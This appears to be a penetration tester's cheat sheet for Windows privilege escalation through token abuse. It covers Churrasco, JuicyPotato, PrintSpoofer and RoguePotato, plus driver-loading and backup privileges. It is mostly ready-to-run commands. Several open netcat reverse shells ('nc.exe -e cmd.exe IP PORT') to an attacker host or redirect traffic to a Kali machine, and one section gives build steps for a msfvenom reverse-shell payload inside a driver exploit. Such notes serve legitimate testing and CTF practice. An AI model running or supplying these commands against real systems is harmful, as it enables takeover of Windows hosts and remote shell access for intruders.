windows token exploits

Churrasco

REQUIREMENTS:

• SeImpersonalPrivilege

• Windows XP/VISTA/2003/2008, Win Server 2003

# usage
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"

HotPotato

• Windows 7,8,10, Server 2008, Server 2012

JuicyPotato

REQUIREMENTS:

• SeImpersonatePrivilege

• machine is < Windows 10 1809 < Windows Server 2019

• CLSID: http://ohpe.it/juicy-potato/CLSID/

  • Can use http://ohpe.it/juicy-potato/CLSID/GetCLSID.ps1

• Try: {03ca98d6-ff5d-49b8-abc6-03dd84127020}

> JuicyPotato.exe -l 1337 -p "c:\windows\system32\cmd.exe" -a "/c PATH\nc.exe -e cmd.exe IP PORT" -t * -c CLSID
> Juicy.Potato.x86.exe -l 1337 -p "c:\users\public\kashz.exe" -t * -c CLSID

> PSExec64.exe -i -u "nt authority\local service" <shell.exe>

PrintSpoofer

REQUIREMENTS:

• SeImpersonatePrivilege

• Win10, Server 2016, Server 2019

> PrintSpoofer.exe -i -c cmd.exe
> PrintSpoofer.exe -c "nc.exe IP PORT -e cmd.exe"
# -i : interactive
# -c : command to run

RoguePotato

REQUIREMENTS:

• SeImpersonatePrivilege

• machine is >= Windows 10 1809 & Windows Server 2019

# socat redirector for OXID resolving, must use 135
$ socat tcp-listen:135,reuseaddr,fork tcp:KALI_IP:9999
> RoguePotato.exe -r KALI_IP -e "PATH\nc.exe IP PORT -e cmd.exe" -l 9999

SeLoadDriverPrivilege

REQUIREMENTS:

• Visual Studio to compile

Steps:

1. obtain user SID

   1. Get-ADUser -Identity 'svc-print' | select SID

   2. (New-Object System.Security.Principal.NTAccount("svc-print")).Translate([System.Security.Principal.SecurityIdentifier]).value

2. Clone Repo: tandasat/ExploitCapcom/

3. Generate .exe msfvenom reverse shell

4. Update path to reverse shell on target line 410 in file ExploitCapcom.cpp

5. Set for RELEASE

6. Build Solution

7. run .\ExploitCapcom.exe

SeBackupPrivilege

• https://github.com/giuliano108/SeBackupPrivilege